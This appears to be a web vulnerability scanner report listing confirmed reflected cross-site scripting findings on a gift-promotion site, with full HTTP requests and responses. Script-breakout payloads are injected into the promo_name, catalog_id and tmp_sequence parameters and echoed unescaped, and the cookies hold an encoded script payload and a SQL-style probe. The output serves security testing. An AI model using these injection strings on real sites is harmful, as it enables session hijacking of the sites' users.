GET /ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000077)%3C/script%3E&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=3&ups_ref=cg&sendroikwd=3&raf_ad_id=3&remoteRef=3_4_0_5068_0&return_url=3&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: promo_name_cookie=2192name; c_user_pin_id=200492244; c_pin_key=706853; c_email_key=063756462f49f8c46ec5bc4e60bb02b1; gift_cookie=29617; promo_cookie=v4|207753-14843-:1303916203; scook=1303916203; k=5113356; v=5113356; (CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDI5KTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 14:56:44 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db82eac1fc28ah9;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie='"--></style></script><script>netsparker(0x000077)</script>;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg-int&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name='"--></style></script><script>netsparker(0x000077)</script>&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x000077)</script>&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-int-ic_3group_group1&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x000077)</script>&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x000077)</script>&catalog_id=13200&gift=29617#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name='"--></style></script><script>netsparker(0x000077)</script>&catalog_id=13200&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x000077)</script>&gift=29617&catalog_id=13200#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name='"--></style></script><script>netsparker(0x000077)</script>&gift=29617&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x000077)</script>&catalog_id=13200&gift=29617" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name='"--></style></script><script>netsparker(0x000077)</script>&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x000077)</script>&catalog_id=13200&gift=29617" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name='"--></style></script><script>netsparker(0x000077)</script>&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x000077)</script>&catalog_id=13200&gift=29617" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name='"--></style></script><script>netsparker(0x000077)</script>&catalog_id=13200&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x000077)</script>&catalog_id=13200&gift=29617" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name='"--></style></script><script>netsparker(0x000077)</script>&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x000077)</script>&catalog_id=13200&gift=29617" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name='"--></style></script><script>netsparker(0x000077)</script>&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x000077)</script>&catalog_id=13200&gift=29617" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name='"--></style></script><script>netsparker(0x000077)</script>&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=296..

Parameters

Parameter Type Value
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
path GET p.prize.prepop-reg-int
page_tmp_id GET 9
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET '"--></style></script><script>alert(0x00007E)</script>
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_tmp GET 3
ups_ref GET cg
sendroikwd GET 3
raf_ad_id GET 3
remoteRef GET 3_4_0_5068_0
return_url GET 3
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265
page_list GET li_sr_sm

Request

GET /ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00007E)%3C/script%3E&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=3&ups_ref=cg&sendroikwd=3&raf_ad_id=3&remoteRef=3_4_0_5068_0&return_url=3&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: promo_name_cookie=2192name; c_user_pin_id=200492244; c_pin_key=706853; c_email_key=063756462f49f8c46ec5bc4e60bb02b1; gift_cookie=29617; promo_cookie=v4|207753-14843-:1303916206; scook=1303916206; k=5113356; v=5113356; (CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDI5KTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 14:56:46 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db82eae527775ut;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg-int&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id='"--></style></script><script>netsparker(0x00007E)</script>&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x00007E)</script>&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-int-ic_3group_group1&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x00007E)</script>&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x00007E)</script>&gift=29617#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id='"--></style></script><script>netsparker(0x00007E)</script>&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x00007E)</script>#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id='"--></style></script><script>netsparker(0x00007E)</script>#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x00007E)</script>&gift=29617" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id='"--></style></script><script>netsparker(0x00007E)</script>&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x00007E)</script>&gift=29617" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id='"--></style></script><script>netsparker(0x00007E)</script>&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x00007E)</script>&gift=29617" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id='"--></style></script><script>netsparker(0x00007E)</script>&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x00007E)</script>&gift=29617" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id='"--></style></script><script>netsparker(0x00007E)</script>&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x00007E)</script>&gift=29617" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id='"--></style></script><script>netsparker(0x00007E)</script>&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x00007E)</script>&gift=29617" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id='"--></style></script><script>netsparker(0x00007E)</script>&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=296..

Parameters

Parameter Type Value
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
path GET p.prize.prepop-reg-int
page_tmp_id GET 9
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET 13200
tmp_sequence GET '"--></style></script><script>alert(0x000084)</script>
page_tmp GET 3
ups_ref GET cg
sendroikwd GET 3
raf_ad_id GET 3
remoteRef GET 3_4_0_5068_0
return_url GET 3
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265
page_list GET li_sr_sm

Request

GET /ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000084)%3C/script%3E&page_tmp=3&ups_ref=cg&sendroikwd=3&raf_ad_id=3&remoteRef=3_4_0_5068_0&return_url=3&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: promo_name_cookie=2192name; c_user_pin_id=200492244; c_pin_key=706853; c_email_key=063756462f49f8c46ec5bc4e60bb02b1; gift_cookie=29617; promo_cookie=v4|207753-14843-:1303916208; scook=1303916208; k=5113356; v=5113356; (CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDI5KTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 14:56:48 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db82eb0adcceta2;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<HTML>

<HEAD>
<TITLE>Gift Offer Selection Page</TITLE>
<style type="text/css">
<!--
.18px { font-family: Arial, Helvetica, sans-serif; font-size: 18px}
.12px { font-family: Arial, Helvetica, sans-serif; font-size: 12px}
.10px { font-family: Arial, Helvetica, sans-serif; font-size: 10px}
.9px { font-family: Arial, Helvetica, sans-serif; font-size: 9px}
-->
</style>
<script language="javascript">
function confirmExit()
{
if (x_cmd == 1)
{
return 'Click CANCEL to continue to your gift!';
}
}
window.onbeforeunload=confirmExit;
</script>
<SCRIPT>
<!--
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg-int&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence='"--></style></script><script>netsparker(0x000084)</script>&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

// -->
</SCRIPT>
</HEAD>
<BODY onUnLoad="x_win();" bgcolor="#FFFFFF" text="#000000">
<table width="100%" border=0 cellspacing=0 cellpadding=0 align="center">

<tr>
<td align=center colspan=2><img border=0 src="http://i.pcp001.com/t/6846/statusbar3_silver.gif"> </td>
</tr>


</table>
<table width="700" border="1" cellspacing="0" cellpadding="0" bordercolor="#FFCC00" align="center">
<tr>
<td><table width="700" border="0" cellspacing="0" cellpadding="0" align="center">
<tr>
<td valign=top>

<table width="100%" border=0 cellspacing=0 cellpadding=0>
<tr>
<td colspan=2><table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">
<tr>
<TD><P> <font face="Arial, Helvetica, sans-serif"> <FONT size="5" color="#000000"><B> $250 in McDonald's&reg; Arch Cards&trade; - Reserved for</B></FONT>: <BR>
<FONT COLOR=#FF0000 SIZE=-1>dork@webprizeland.com
</FONT> </TD>
<TD ALIGN=center> <img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""> </TD>
</TR>
<TR>
